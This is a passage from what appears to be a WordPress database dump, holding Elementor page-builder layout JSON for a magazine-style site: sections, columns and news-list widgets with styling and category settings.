":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"choose_column\":\"4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1289,457,'_elementor_version','0.4'),(1291,458,'_elementor_edit_mode','builder'),(1292,458,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_sty